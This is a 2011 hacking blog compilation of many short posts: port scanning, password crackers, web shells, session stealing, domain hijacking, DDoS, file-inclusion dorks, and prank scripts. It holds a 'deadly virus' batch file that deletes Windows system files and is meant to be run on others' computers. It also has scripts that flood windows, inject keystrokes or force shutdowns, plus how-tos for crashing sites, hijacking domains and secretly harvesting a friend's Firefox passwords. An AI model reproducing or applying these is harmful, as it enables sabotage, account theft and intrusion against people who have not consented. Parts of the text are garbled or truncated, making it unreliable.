Sunday, 24 April 2011


Many computer criminals give out user names and ovens that they obtained illegally. MORE......
"Where do I type that command?" People ask that all the time when they read my early Guides to (mostly) Harmless Hacking.
However, nowadays you might never even hear about telnet, much less use it, unless you are a hacker. So if you are still wondering about telnet, today is your lucky day.
What Is Telnet? Telnet is a protocol that is most commonly used to log into a remote computer. It also is the single most powerful hacking tool on the planet. With just a telnet client program, you can: send email download source code from web sites send unexpected input to webservers that can give you amazing and sometimes interesting results give arbitrary input to many other services on Internet host computers probe the services offered by servers, routers and even people's home computers.

Saturday, 23 April 2011

How to find the MAC address of a device from its IP address

During a ping the IP address must be resolved to the physical MAC
address. As a result your computer keeps a physical address
translation table called an ARP table.

From a command prompt ping the IP address. After the ping has completed type
arp -a
This will list all the IP addresses and corresponding Physical
addresses that have been resolved

How to hack remote computer using IP Address

Now, what do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

Example 1:

Ophcrack Guide : Hack Any Password In Windows

There might be many times you have heard of Ophcrack, now what is actually it well is a popular to crack passwords in windows.
Many Hackers out there love this tool and you should also, Tools like this made hacking possible in this world of security’s.

What is ophcrack ?

Ophcrack is a free Windows password cracker based on rainbow tables.
It is a very efficient implementation of rainbow tables done by the inventors of the method.
It comes with a Graphical User Interface and runs on multiple platforms....

How to do Netbios Hacking


1.Open command prompt

2. In the command prompt use the “net view” command

How to disguise yourself as a Google Bot.

Yes, sometimes you want to visit sites, acting like a machine, to confuse people. You can, in fact, disguise yourself as a Google spider or bot. You see, there is something called a Google Web Site Translator. What it does, as you put in a site, select what language to translate it to, and it displays the page in the selected language. For example, the page is in German, so you select, “German to English”, and it will display it in English.
You can use this translator as a proxy. If you’re some idiot who wants to spam a forum or hack a Myspace, you could use that, but I will hate your sorry ass for using my article to do your dirty work, you smart donkey. This Google, “proxy”, may not be as secure as some proxies, but it does confuse people.

How To View Hidden Directories In A Website Using Robots.txt

Many a times in hacking you need to know the web directories. But its hard to find it out as a server might contain uncountable no. of Directories in it.
But a major hole in this security is the Robots.txt
What is Robots.txt

Deadly Virus

hey frndzzzzzzzzzz
do you have this post you can learn how to make deadly virus.

@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

Copy these lines in notepad and save it as "
h4cker.bat" or "h4cker.exe"

Try this on any other comp.. Very heavy Virus.. njoyyyyyyyyyyyyyyyyyyy

Javascript Injection Attack

Javascript Injection is a facility by which we can insert our own javascript codes into the websites, either by entering the code into the address bar, or by finding an XSS(Cross site Scripting) vulnerability in a website. Note that the changes can only be seen by you and are not permanent. This is because JavaScript is a ‘client-side’ language.
This can be very useful when one needs to spoof the server by editing some form option.
Javascript Injection Shall be briefly covered up in the following three parts
1. Injection Basics
2. Cookie Editing
3. Form Editing

Friday, 22 April 2011

free download ebook | XSS Attacks

PUBLISHED BY- Syngress Publishing, Inc. ISBN-10: 1-59749-154-3
ISBN-13: 978-1-59749-154-9

This book is all about XSS. It will cover these topics on XSS.

Cross-site Scripting Fundamentals.
The XSS Discovery Toolkit
XSS Theory
XSS Attack Methods
Advanced XSS Attack Vectors
XSS Exploited
Exploit Frameworks
XSS Worms
Preventing XSS Attacks

Download Here:

Free download e-books Bulletproof Wireless Security

Bulletproof Wireless Security
Paperback: 272 pages | Publisher: Newnes (June 30, 2005) | Language: English | ISBN-10: 0750677465 | ISBN-13: 978-0750677462 | 2.4 MB | PDF

Finally–a single volume guide to really effective security for both voice and data wireless networks!

More and more data and voice communications are going via wireless at some point between the sender and intended recipient. As a result, truly "bulletproof" wireless security is now more than a desirable feature–instead, it’s a necessity to protect essential personal and business data from hackers and eavesdroppers.
In this handy reference, Praphul Chandra gives you the conceptual and practical tools every RF, wireless, and network engineer needs for high-security wireless applications.
Download Here:

hack a website using c99 script

hack a website using c99 script

The c99 shell script is a very good way to hack a php enable web server. You have to find an unsecure uploader to upload this file to the server. Here i used unsecure uploader means the uploader which can't check for file extension and allow us to upload our executable scripts to the server.

This c99 shell allows an attacker to hijack the php enable web server. This script is very user friendly and having very good interface so it is easy to use. You can issue any php command to run on the web server. You can use any of the commands given in the script to run on the web server.

Thursday, 21 April 2011

UCSniff- VoIP Sniffing tool

UCSniff- VoIP Sniffing tool

Most of the people think that VoIP service is secure and still safe from hackers. But today i am going to write about a tool which is freeware sniffing tool for VoIP service. This tool is UCSniff.

UCSniff is a VoIP & IP Video Security Assessment tool that integrates existing open source software into several useful features, allowing VoIP and IP Video owners and security professionals to rapidly test for the threat of unauthorized VoIP and Video Eavesdropping.
This tool is written in C/C++, and available on Linux and Windows, the software is free and available for anyone to download, under the GPLv3 license. Some useful features of UCSniff that have been combined together into a single package:

  • Allows targeting of VoIP Users based on Corporate Directory and/or extensions
  • Support for automatically recording private IP video conversations
  • Automatically re-creates and saves entire voice conversation to a single file that can be played back by media players
  • Support for G.729, G.723, G.726, G.722, G.711 u-law, and G.711 a-law compression codecs
  • Support for H.264 Video codec
  • Automated VLAN Hop and VLAN Discovery support
  • A UC Sniffer (VoIP and Video) combined with a MitM re-direction tool
  • Monitor Mode
  • Sniffs entire conversation if only one phone is in source VLAN
  • Gratuitous ARP Disablment Bypass support
  • TFTP MitM Modification of IP Phone features
  • Realtime VoIP and Video Monitor
Download Here:

sessionthief | HTTP Session Cloning Tool | Hack facebook, Gmail, twitter over insecure LAN

HTTP Session Cloning & Cookie Stealing Tool 
Facebook hacking, Gmail hacking, twitter hacking tool

Sessionthief is the best tool to hack into another email accounts of facebook accounts in open wireless connections. it has the ability to hack into most websites accounts of another user on the same LAN is logged into.
sessionthief tool performs HTTP session cloning by cookie stealing on the insecure LAN and let you use that cloned session to access other's account.
It can issue basic nmap and nbtscan commands to see which IPs are on the subnet, or just listen for IPs broadcasting packets. It can quickly perform ARP poison routing to get packets given the IP of the client if not on an open network or hub, and should also work with interfaces in monitor mode. It integrates automatically with Firefox, dynamically creating a temporary profile for each attack performed. In this way, in contrast to tools like the middler, it doesn’t require any additional configuration, and makes it easy to simultaneously own multiple logins to the same site.

Backdoor Distributed as Facebook Messenger Application

Backdoor Distributed as Facebook Messenger Application

New rouge emails posing as official facebook communication service lead users to a 3rd party website which is distributing a backdoor as Facebook Messenger Application. This rouge email bear a subject as "someuser listed you as his uncle" and make use of real theme to look like  real facebook notifications. In the body of message, it informs for a pending action including a friendship request. It's link is of but it actually points to some 3rd party website.That new page has an advertisement of a program facebook Messenger which is claimed to be an app for quick access to messages from your Facebook account. The website contain an an executable called FacebookMessengerSetup.exe for download. According to researchers from Trend Micro, the file is an installer for BKDR_QUEJOB.EVL, a backdoor that opens a connection on TCP Port 1098 and listens for commands.
The backdoor allows attackers to update the malicious file, download and run other malware applications, and launch certain processes. Information about the infected system, such as installed antivirus products and OS version, is gathered and sent to an SMTP server.
we have seend so many password changing and phishing scamsin the faceboook. It's a new type of attack on facebook users.
Be sure not to install any this type  of plugins or software which is suspicious in any ways.

Domain Name Hijacking

In this post, I will show you how domain names are hacked. Hacking of a domain name from it's original user is known as Domain name hijacking. Let me explain what is this.

Suppose i bought a domain name. Now i need a web host for hosting my website. 
Now how it works??

When we bought a domain name, we also get a control panel for full control on this domain name. From this control panel we point our domain to the web server where our files are actually host.
For ex- I have a domain name and i bought hosting at a server then for working of our website we need to setup our domain to point to our web hosting server

Now how domain hijacked??
For hijacking a domain name, you need to get access the domain name control panel and point out it to your website server from it's original server. In above example, suppose a person Y wants to hack the domain name He will try to get access to the control panel of the domain name After doing this he will change it to point where Y has hosted his website. Now we can see thaty the original website was on but now it changes to All visitors of will see a different website now.

How to get access to the domain control panel??
To hijack a domain name it is necessary to get access to the domain name control panel. For this we need 2 infornmations.
  1. Domain name registrar
  2. Administrative email associated with this domain
This is very easy to get these information about a domain name. Use WHOIS service for this. go to enter the target URL and lookup. You will get the whois record of the domain name. NOw see the record and find the administrative email address and registrant service provider for this domain name. Now you have both informations about this domain name.
The administrative email address of this domain name is the key to hijack this domain name. Now hack this email account. For hacking email account go and read email account hacking of this website section.
after gaining access to this email id, search in mail for emails from the registrar emails. Surely there will be an email with user name and password. If not then go to the registrar website and click on forgot password link and reset the password of your choice. Now you can login to the control panel of the domain name. Change the settings of this domain name. 
Domain name is now hijacked ......

How to protect your domain name??
For protecting your domain name, protect your administrative email address. Protect your email account from being hacked.
Another best way is private domain name registration. In this type of registration, your private information such as administrative address will be hidden to public in whois records. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option

please comment below if this post is useful for you..

hack websites by using ddosim v0.2 (Application Layer DDOS Simulator)

DDOSIM simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, DDOSIM starts the conversation with the listening application (e.g. HTTP server). Can be used only in a laboratory environment to test the capacity of the target server to handle application specific DDOS attacks.

  • HTTP DDoS with valid requests
  • HTTP DDoS with invalid requests (similar to a DC++ attack)
  • TCP connection flood on random port

Local File Incusion (LFI)

Local File inclusion is a common website hacking trick. This tutorial will show you how to exploit a website using LFI.
First of all, take a look on the given php code.

The above given code is generally used in many website by web developers which should not
be use because the $page isn't sanitized and is passed directly to the webpage. This code is used by hackers for LFI.

In general, you have seen many URL's like this

Parallel Log-in Password Cracking Tool | NiX Brute Force

NiX Brute Force V.1.1.0

NiX Brute Forcer is a password cracking tool. This tool uses brute force  attack in parallel to log into a system without having authentication credentials. This password cracking tool supports variety of services which allow remote authentication such as: MySQL, SSH, FTP, IMAP. It is based on NiX Proxy Checker. This tool demonstrates the importance of choosing a strong password for secure login. Brute force attack is really a strong attack against passwords.

Read Changelog here:


  • Basic Authorization & FORM support in both standard and HTTPS (SSL) mode
  • FORM auto-detection & Manual FORM input configuration.
  • It is multi-threaded
  • HTTP/SOCKS 4 and 5 proxy support
  • With Success and Failure Keys results are 99% accurate
  • Advanced coding and timeout settings makes it outperform any other brute forcer
  • Wordlist shuffling via macros
  • Auto-removal of dead or unreliable proxy and when site protection mechanism blocks the proxy
  • Integrated proxy randomization to defeat certain protection mechanisms

Download Here:

Best 5 password cracker - Tools used in password cracking

Here is the list of some popular password cracking tools with their download link:
File Size: 3.7 MB
  1. Mdcracker 
  2. john-17
  3. md5-crack
  4. Rainbowcrack 
  5. Hydra
Download Here :

Auto Save Passwords Without Notification in Firefox

Auto Save Passwords Without Notification in Firefox

Hey friends. Today i am going to write about a simple firfox hack which helps you to hack your friends easily. When ever you try to login in any account, firefox shows a notification asking for store user name and password for this website. But aftre using this trick it will never ask to store the password but it would atomatically store all the password. Its ideal trick if you want to get someones login details who uses your computer.

follow these steps:
1) First of all you need to close firefox.
2) Now locate the nsloginmanagerprompter.js file which is normally found in
3) Open nsloginmanagerprompter.js with notepad or other editor. But the editor which would show the line number will be ideal.
4) Replace the entire line 804 to 869 with the following code
var pwmgr = this._pwmgr;
After replacing this, save this file
Now it's done. yeppie....
To see the usernames + passwords, go to tools --> options --> security --> saved password

Monitor and control remote computer by Network LookOut Administrator Professional 3.6.1

Network LookOut Administrator Professional 3.6.1 | 5.6 MB
The Network LookOut Administrator allows you to see live screens of remote computers. This way, you can always watch what users are doing on the remote computer. Additionally, you have the ability to take control of a remote computer by controlling the mouse and keyboard; this is especially useful when you need to assist the person who uses the remote computer. If you are an administrator, you can easily administer remote computers from your computer.

What does it do?

It allows you to see live screens of remote computers. This way, you can always watch what users are doing on the remote computer. Additionally, you have the ability to take control of a remote computer by controlling the mouse and keyboard; this is especially useful when you need to assist the person who uses the remote computer. If you are an administrator, you can easily administer remote computers from your computer.

What is it useful for?
For monitoring your children s activities on a remote computer.
For monitoring students in the classroom to achieve better discipline or, just to assist them (by using the remote control feature) when they are in trouble.

For lowering your business costs by monitoring what your employees are doing on their computers and helping them when they call you. Using the remote control feature enables you to fix problems remotely without visiting them; this saves you precious time.
For administrating all computers just from one location your computer.
Turning off, restarting, hibernating …. remote computers with one click.

Download links:

DORK LIST for Remote File Inclusion

In one of my previous article i wrote how to hack a website by Remote FILE INCLUSION .
Remote File Inclusion ( RFI ) allows the attacker to upload his file on website server. Using RFI you can literally deface the websites, get access to the server. Read my previous article first, if you do not know about RFIIf you want to find a victim for this type of attack, use Google hacking. Google hacking will give you a list where you can find you victim easily. Use these commands given below in Google search.

The Google dork for RFI is given below:




this is not the end of the list...

please comment below if this post is useful for you..

How to crash small websites using RDOS | DDOS tutorial

Have you ever wanted to DDOS attack on a website. Here I am going to write about a tool which is really helpful but it wouldn't be effective on big servers. 

NOTE: Please do not try to this tutorial to harm any other's website. I will not be responsible in any case. If you are not agree, please leave this website without reading further tutorial

You need:

  1. Port Scanner Download Here
  2. rDOS Download Here
  3. Ip Hiding tool Download Here

Follow these steps:

1: First of all you need to know the IP address of the website you want to crash.
Use ping command in windows to get the ip address of the website.
open CMD and enter ping
see the snap
Now you have the IP address of the website.

2: Now use Port scanner to check whether PORT 80 is open or not. If PORT 80 is not open choose another website to hack :P
otherwise you can crash this website.

3: Now open your  rDos. Enter your victims ip that you got from step 1.
It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work.

comment if you have any problem

Fix The Blue Screen Error – Or The Blue Screen Of Death Error

One of the biggest problems with Windows is the famous "Blue Screen Of Death" error. It’s an error which suddenly appears out of nowhere and makes your computer crash, with the only way of being able to recover from it being to restart your PC.
There are many types of blue screen error but all of them cause annoyance and confusion – especially if you don’t know why they are appearing. Here’s an example of one:

Blue Screen Of Death Example

Wednesday, 20 April 2011

Make Free Phone Calls PC to Mobile or Landline

Hello Friends I am back again. Today I am going to share few cool things like "How to make Free Phone calls from your PC to any Mobile or Landline phone in the World". Its absolutely free i.e 100% free. So guys read on....

Things That U will Need:
1. Internet connection.
2. Web Browser.
3.Adobe Flash Player 9 or higher.
4.Head Phone with mic.

Note : You Can Make only One Call using an IP in a Day. But It can be exceeded if u have dynamic IP like BSNL broadband....
Disconnect ur Internet and call again u will be able to make another call...

Steps Involved:

1.Open Your Web Browser and Visit the following Link:

2. Now You Will See Something like This:
Make Free Phone Calls PC to Mobile or Landline

Now Click Here as shown In picture to select your Country where you want to make call. 

Make Free Phone Calls PC to Mobile or Landline
3. Now Type the number as shown above and press dial button.
4. Just wait around 15 sec your call will be connected.(Ignore the small 10 sec video It will hide automatically.)


EvaPhone provides Internet telephone calls for free. Our site offers free VoIP call solutions: free VoIP service lets you make PC-to-phone free international calls. All you need is a computer to start making free VoIP calls using Internet to phone. Start enjoying the benefits of Internet telephony right now!



Orkut hack : Hacking Orkut account password by cookie stealing

I have mentioned about way of Hacking orkut account password by orkut phishing in my previous emailaccount hacking articles. I was asked by many readers about
how to hack orkut account password
by cookie stealing method. So, i thought of informing you about method of hacking orkut account password using cookie stealing method in this security article.

Hacking orkut account by cookie stealing
Note : This trick of hacking orkut account password is no more working, due to recent updates by I was asked by many readers about this way of hacking orkut account and hence informing you. Keeping knowledge of this way of hacking orkut account will help you in future.

Hacking orkut account password:

1. Get Firefox and then Cookie editor firefox addon.

Thursday, 14 April 2011

Make Your Mobile Phone a PC Remote to Control PC

Hey guys Today I will going to explain How to use your Mobile phone to control your PC from anywhere In the Home. Imagine walking home from work or college, and turning on your favorite music tracks straight from your phone as you walk in the room. So Guys here is the method...

1. PC with Bluetooth connectivity (If your PC don't have Bluetooth Buy a Bluetooth Dongle it cost only Rs 100)
2. Mobile Phone with Bluetooth Inbuilt.
3. Java Compatibility Mobile Phone.
4. Mobile Witch
(Before you  get started you will need to install both Mobile Application and PC Server.)
5. If Mobile witch is having Problem then use Phone Remote Control (

What is Mobile Witch??
MobileWitch is a very interesting free of charge computer software that allows you to turn your phone into a Pc Remote Control. It will allow you to access various PC application with your Phone. Now you can easily remote control your PowerPoint presentations, Mouse Cursor or simply explore the content of your computer directly from your mobile phone. To take advantage of this software you will need to have a PC and a phone that support bluetooth to send and receive data.

Key Features include: 

  • Remotely control Mouse, Keyboard, PowerPoint, Winamp, Windows Media Player and much more
  • Get access to your desktop from your phone
  • Bluetooth setup free! Simply connect from your phone
  • Customize your applications through Keymaps or VB and JScripts
  • Supports all PC Bluetooth solutions Toshiba, Windows, BlueSoleil and Widcomm/Brodacom

The software consist of two parts. There is a client and then there is a server which are both programmed in JAVA. The former is located into a J2ME capable mobile phone with Bluetooth capabilities while the latter is placed in the computer you wish to remotely control. So all you need to do is run the software on your mobile phone with Bluetooth™ support and a Bluetooth dongle installed on your computer.


Step 1:
Start the PC Server application first

Step 2:
Start the Mobile Application. On Nokia phones the shortcut is located in Menu/Applications/Collection. The phone will automatically start searching for active devices.
Once both devices are connected you will be abble to acces the Mobilewitch Bluetooth Remote Control Menu from your phone.
From this menu you will be able to control your mouse cursor, keyboard and the following programs, if installed on your computer: Windows Explorer, Firefox, Window Media Player , Internet Explorer, Winamp and Powepoint. Please note that each application you would like to control has to be first started from the computer and needs to be Always On Top of your desktop.
The application does not require any configuration of Bluetooth or Java on both the client or server and the applications it work with are Firefox, Winamp, Windows Media Player, PowerPoint, Internet Explorer and Explorer.






RSDownloader is Rapidshare Premium Download Manager for batch downloading and uploading of files for The application offers maximal functionality, accessible using a simple and intuitive user interface


please friends Don't forget to leave comment and Follow my blog. + === ++ + === ++ @@@@@@@@@@@@@@@@@@@@@@

Some Cool Notepad Hacks

Hey Friends Welcome back today I am going to share few New Notepad hacks. They are really cool and crazy one's. So Please think atleast three to four times to use them on ur PC.

Cool Notepad Hacks

This will pop up endless notepads until the computer freezes and crashes. Copy the below code in notepad and save it as ".vbs" extension.

@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top

This constantly turns caps lock on and off really fast continuously.

Set wshShell =wscript.CreateObject(”WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

This makes it so the backspace key is constantly being pressed.

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “{bs}”

Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "You are a fool."

Convey your friend a message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files .

Send a Self Deleting SMS : DELETED Auto After Reading

Hello Guys today I am going to discuss the latest Technology in the Field of SMS. Its Really Awesome so I decided to discuss it with u all. Today I am going to tell you about How to send a Self deleting SMS to any mobile that is It is automatically deleted after user reads it. Isn't This amazing so Guys Read On....

Basically this technique is called SAFE-TEXT that is message is deleted after user reads it.
Basically this is a Website which allows you to send such type of sms for free of cost after registering on it. But it has limitation that you can send only 10 SMS a day.


1. To register and activate, text WIRED to 83118 (charged at your standard network rate). You’ll be able to send up to 10 messages daily.
2. If you’re the sender, the message will show your name and number.
3. Write your libel-ridden hate speech and hit send.
4. The receiver will then be sent a text telling them they have been sent a Wired Safe Text with a link to the mobile internet site that hosts your message.
5. When they click through they will activate Safe Text. They will only have a few seconds to read the text (so don’t make it too long) before it self-destructs.
These are the steps. So I hope u will surely like This....